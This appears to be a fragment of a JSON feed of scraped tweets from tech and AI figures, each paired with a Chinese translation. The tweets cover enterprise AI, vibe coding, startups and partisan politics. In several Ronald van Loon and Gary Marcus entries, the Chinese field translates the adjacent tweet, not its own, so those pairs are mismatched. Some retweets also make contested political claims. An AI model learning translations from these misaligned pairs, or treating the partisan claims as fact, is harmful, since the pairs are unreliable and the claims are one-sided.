"@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials\nvia @IlirAliu_\n \n#Robotics #ArtificialIntelligence #ML #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m", + "published_at": "2026-04-27T13:11:07+00:00", + "title_zh": "双臂娱乐型人形机器人启动工业实地测试" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", + "url": "https://nitter.net/sama/status/2048751392031203544#m", + "published_at": "2026-04-27T13:09:30+00:00", + "title_zh": "关于育儿的思考\nhttps://paulgraham.com/kids.html" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My view is simple:\n\nThe winners in enterprise AI will not be the companies with access to the most models.\n\nThey will be the ones that build the best intelligent systems around them.\n\nIf you want the full breakdown, watch the video and tell me what part of your AI stack you are rethinking first.\n\nWhat do you think becomes the real source of advantage in the next 12 months, the model itself, or the orchestration layer around it?\n\nCheck out the full article: https://www.linkedin.com/pulse/agentic-ai-reshaping-enterprise-strategy-faster-than-you-van-loon-9rfme", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m", + "published_at": "2026-04-27T13:00:20+00:00", + "title_zh": "双关误解来自于用户在开放模型和专有模型间的取舍观念。\n\n他们并不需要选择。\n\n更高明的策略在于将这二者结合起来使用。\n\n→ 使用专有模型用于扩大和广泛的能力\n→ 采用开放模型增加灵活性与控制能力\n→ 使用协调层来实时安排每个任务优先路由到适合的模型上。\n\n这种混合模式可以基于性能、成本和治理设定一个平衡点,避免锁定单一选择。" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: The second misconception I keep seeing:\n\nToo many teams think they have to choose between open models and proprietary models.\n\nThey do not.\n\nThe smarter path is hybrid.\n\n→ proprietary models for scale and broad capability\n→ open models for flexibility and control\n→ orchestration layers to route each task to the best-fit model in real time\n\nThat is how you balance performance, cost, and governance without locking yourself into one lane.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m", + "published_at": "2026-04-27T13:00:20+00:00", + "title_zh": "我的最大收获:\n\n模型开始成为部件,而非最终产品。\n\n接下来关心的是围绕模型的系统层:\n\n→ 执行模型部署\n→ 记忆管理\n→ 调试工具集成\n→ 系统协调\n→ 安全运行环境\n\n该系统将模型转化为代理人,最终实现商业层面的实际功能。" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "R to @Ronald_vanLoon: My biggest takeaway:\n\nModels are becoming components, not products.\n\nWhat matters now is the system around them:\n\n→ runtimes\n→ memory\n→ tool access\n→ orchestration\n→ secure execution environments\n\nThat is what turns a model into an agent, and an agent into something the business can actually deploy across functions.", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m", + "published_at": "2026-04-27T13:00:19+00:00", + "title_zh": "多数企业的AI战略已经跟不上步伐。\n\n原因不是选错了模型,而是仍然停留在模型层面进行考量。\n\n真正的转型正在更上层的系统级别发生:AI 将变成一个能推理、使用工具、保持上下文连续、在安全环境下运作的智能系统。\n\n相比多数领导所认识到的,这种转型将让企业策略更为迅速的改变。\n一条系列推文,来自于我在 NVIDIA 最近视频中的观点解析。\n#NVIDIAPartner #NVIDIAGTC 会议上" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Most enterprise AI strategies are already behind.\n\nNot because they picked the wrong model, but because they are still thinking at the model layer.\n\nThe real shift is happening one level up, where AI becomes a system that can reason, use tools, retain context, and execute work inside secure environments.\n\nThat changes enterprise strategy faster than most leaders realize.\n\nA thread, with insights from my latest video with NVIDIA…\n\n#NVIDIAPartner #NVIDIAGTC", + "url": "https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m", + "published_at": "2026-04-27T13:00:18+00:00", + "title_zh": "KIMM 的变形轮让轮椅可以穿越楼梯和征服各种地形\nvia @spaceandtech_\n\n#创新 #新兴科技 #科技" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain\nby @spaceandtech_\n\n#Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m", + "published_at": "2026-04-27T12:50:08+00:00", + "title_zh": "停止指责用户。事情并不简单:" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", + "url": "https://nitter.net/GaryMarcus/status/2048746152749846549#m", + "published_at": "2026-04-27T12:48:41+00:00", + "title_zh": "许多人将氛围编码的推理操作武断归因于用户身上。这样实际上只是看到了一方面的真相。\n\n用户确实出问题了 —— 未经适当备份、监控、以及系统管理员参与等情况下,就允许此类工具随意访问其文件。\n\n但这也恰好说明我们需要软件工程师 —— 以及Dario关于“软件工程师将消失”的评论为何如此荒谬。\n\n技巧熟练的程序员在谨慎监督下,是可以使用氛围编码工具的。\n\n但业余程序员也" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactly why* we still need software engineers — and why what Dario recently said about software engineers disappearing is so absurd.\n\nSkilled coders can use vibe-coded tools, with careful oversight.\n\nBut amateurs using vibe-coding tools are asking for trouble. \n\nUsing them without a strong prior working knowledge in coding and sysadmin *is* the mistake.", + "url": "https://nitter.net/GaryMarcus/status/2048742983684784239#m", + "published_at": "2026-04-27T12:36:05+00:00", + "title_zh": "“Reddit 上堆积氛围编码的灾难”" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Vibe coded disasters piling up on Reddit”", + "url": "https://nitter.net/GaryMarcus/status/2048739005525877072#m", + "published_at": "2026-04-27T12:20:17+00:00", + "title_zh": "以情感阅读为基础的类人机器人AI\nvia @XRoboHub\n\n#机器人 #人工智能 #创新 #科技 #科技" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being\nvia @XRoboHub\n\n#Robots #ArtificialIntelligence #Innovation #Technology #Tech", + "url": "https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m", + "published_at": "2026-04-27T12:18:17+00:00", + "title_zh": "AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being\nvia @XRoboHub\n\n#Robots #ArtificialIntelligence #Innovation #Technology #Tech" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", + "url": "https://nitter.net/paulg/status/2048704073356935676#m", + "published_at": "2026-04-27T10:01:28+00:00", + "title_zh": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago." + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", + "url": "https://nitter.net/paulg/status/2048701354672050286#m", + "published_at": "2026-04-27T09:50:40+00:00", + "title_zh": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take." + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "url": "https://nitter.net/paulg/status/2048677984106664227#m", + "published_at": "2026-04-27T08:17:48+00:00", + "title_zh": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail." + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!", + "url": "https://nitter.net/jasonfreedman/status/2048615296613937201#m", + "published_at": "2026-04-27T04:08:42+00:00", + "title_zh": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. This is the result: a 90 minute insiders documentary. \n\nI don't work for Y Combinator itself, but I'll give you the experience I've had as a founder, alumni, investor etc. He showed up in March with cameras, videographers, newscasters, youtubers. He brought half the French tech press. \n\nWe spent 4 full days visiting YC founder offices and hacker houses. Going to pre-demo day practice sessions. Late night bar hopping with YC founders. Interviews with YC partners. \n\nIt was real. It was unfiltered. And it was inspiring.\n\nI went to Paris last week with my daughter Callie to watch it in a packed movie theater. This crowd of 500+ French investors got inspired about investing into YC startups. After watching this movie, they understand what I wish everyone understood: YC founders are incredibly capable and resilient builders that want to solve problems and YC helps them become formidable founders. It's impossible to not be inspired by them.\n\nAlan and Bradley Lafond just released the movie on Youtube (link below). Enjoy it! J'espère que vous l'apprécierez!\n\nA big thank you to @dessaigne, @garrytan, Victoria Holst and everyone at YC for helping us. This wasn't an official YC event (our fund and Fundora are not a part of YC to be clear). But they were so welcoming and generous!\n\nIt's an honor to share with France (and now with y'all) the experience I've gotten from YC. Our fund Orange Collective exists to help spread the YC love. If you were thinking of joining us as an investor for Fund I, contact me now before the final close on June 1st. If you're in France, contact Fundora. \n\nAnd big thank you to @nico_laqua, @qhoang09, @gregpr07, @mamagnus00, @smthomas3, @abhiaiyer, @marieschneegans, Veiga Management, Fundora and all the YC founders that hosted us!" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", + "url": "https://nitter.net/atmoio/status/2048608025464705084#m", + "published_at": "2026-04-27T03:39:49+00:00", + "title_zh": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”." + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grok Imagine", + "url": "https://nitter.net/elonmusk/status/2048600964102246438#m", + "published_at": "2026-04-27T03:11:45+00:00", + "title_zh": "Grok Imagine" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀.", + "url": "https://nitter.net/GaryMarcus/status/2048593283639894520#m", + "published_at": "2026-04-27T02:41:14+00:00", + "title_zh": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic principle, either.\n\n𝗪𝗵𝗶𝗰𝗵 𝗶𝘀 *𝗲𝘅𝗮𝗰𝘁𝗹𝘆* 𝘄𝗵𝘆 𝘄𝗲 𝘀𝗵𝗼𝘂𝗹𝗱 𝗻𝗼𝘁 𝘁𝗿𝘂𝘀𝘁 𝗰𝗼𝗱𝗶𝗻𝗴 𝗮𝗴𝗲𝗻𝘁𝘀." + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", + "url": "https://nitter.net/elonmusk/status/2048589691054694406#m", + "published_at": "2026-04-27T02:26:57+00:00", + "title_zh": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": "https://nitter.net/SteveStricklan6/status/2048589239915577837#m", + "published_at": "2026-04-27T02:25:10+00:00", + "title_zh": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close." + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://nitter.net/suchenzang/status/2048582672163995766#m", + "published_at": "2026-04-27T01:59:04+00:00", + "title_zh": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://nitter.net/Jason/status/2048580651985604783#m", + "published_at": "2026-04-27T01:51:02+00:00", + "title_zh": "Incredible writing from @euphoriaHBO" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m", + "published_at": "2026-04-27T01:48:56+00:00", + "title_zh": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://nitter.net/sama/status/2048554097985593849#m", + "published_at": "2026-04-27T00:05:31+00:00", + "title_zh": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful." + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Total AI disaster, totally predictable", + "url": "https://nitter.net/GaryMarcus/status/2048552931923013916#m", + "published_at": "2026-04-27T00:00:53+00:00", + "title_zh": "Total AI disaster, totally predictable" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://nitter.net/sama/status/2048552677433643427#m", + "published_at": "2026-04-26T23:59:53+00:00", + "title_zh": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Remember this", + "url": "https://nitter.net/elonmusk/status/2048543344746250466#m", + "published_at": "2026-04-26T23:22:48+00:00", + "title_zh": "Remember this" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grad school indoctrination camps", + "url": "https://nitter.net/elonmusk/status/2048535299102265720#m", + "published_at": "2026-04-26T22:50:49+00:00", + "title_zh": "Grad school indoctrination camps" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920#m", + "published_at": "2026-04-26T22:34:46+00:00", + "title_zh": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come." + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left.", + "url": "https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m", + "published_at": "2026-04-26T21:21:33+00:00", + "title_zh": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left." + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://nitter.net/DavidSacks/status/2048502978626113625#m", + "published_at": "2026-04-26T20:42:24+00:00", + "title_zh": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own." + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://nitter.net/Jason/status/2048487905543237675#m", + "published_at": "2026-04-26T19:42:30+00:00", + "title_zh": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://nitter.net/HarryStebbings/status/2048486182904852537#m", + "published_at": "2026-04-26T19:35:39+00:00", + "title_zh": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://nitter.net/briantylercohen/status/2048469956627468510#m", + "published_at": "2026-04-26T18:31:11+00:00", + "title_zh": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail." + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://nitter.net/Jason/status/2048465651723882972#m", + "published_at": "2026-04-26T18:14:04+00:00", + "title_zh": "Ok @Acosta, balls in your court" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://nitter.net/Jason/status/2048463405590225173#m", + "published_at": "2026-04-26T18:05:09+00:00", + "title_zh": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00", + "title_zh": "Accurate" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00", + "title_zh": "RT by @DavidSacks: Accurate" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California", + "url": "https://nitter.net/SpaceX/status/2048453949381091634#m", + "published_at": "2026-04-26T17:27:34+00:00", + "title_zh": "RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m", + "published_at": "2026-04-26T17:27:23+00:00", + "title_zh": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon." + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://nitter.net/Jason/status/2048450286902235560#m", + "published_at": "2026-04-26T17:13:01+00:00", + "title_zh": "Who made this?!" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?", + "url": "https://nitter.net/KonstantinKisin/status/2048448438715445382#m", + "published_at": "2026-04-26T17:05:40+00:00", + "title_zh": "RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://nitter.net/Jason/status/2048437340218044499#m", + "published_at": "2026-04-26T16:21:34+00:00", + "title_zh": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://nitter.net/Jason/status/2048436081725464959#m", + "published_at": "2026-04-26T16:16:34+00:00", + "title_zh": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far 